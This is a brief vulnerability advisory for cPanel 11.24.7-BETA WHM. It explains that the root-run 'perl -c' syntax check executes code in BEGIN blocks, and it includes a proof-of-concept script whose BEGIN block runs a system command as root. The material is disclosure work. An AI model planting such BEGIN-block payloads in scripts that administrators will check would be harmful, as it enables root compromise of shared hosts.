cPanel 11.24.7-BETA_34914 - /scripts/fixperlscript runs 'perl -c' as root, allowing for code execution via BEGIN blocks
DESCRIPTION
WHM contains a feature for the root user that checks the syntax of a specified perl script to ensure there are no errors. It does this by passing the '-c' option to the perl binary. Any perl code contained within BEGIN blocks is executed when perl -c is ran. Thus, since this feature failed to drop privileges, a malicious individual could request their webhost to click the link in WHM to check their (trojaned) perl script, completely compromising the local machine.
IMPACT
Full system compromise.
Running perl -c on code without a BEGIN block:
[root@host ~]# cat test.pl #!/usr/bin/perl system("/usr/bin/id > /home/user/id.out"); [root@host ~]# perl -c test.pl ; cat /home/user/id.out test.pl syntax OK cat: /home/user/id.out: No such file or directory
Running perl -c on code with a BEGIN block:
[root@host ~]# cat test.pl #!/usr/bin/perl BEGIN { system("/usr/bin/id > /home/user/id.out"); } [root@host ~]# perl -c test.pl ; cat /home/user/id.out test.pl syntax OK uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)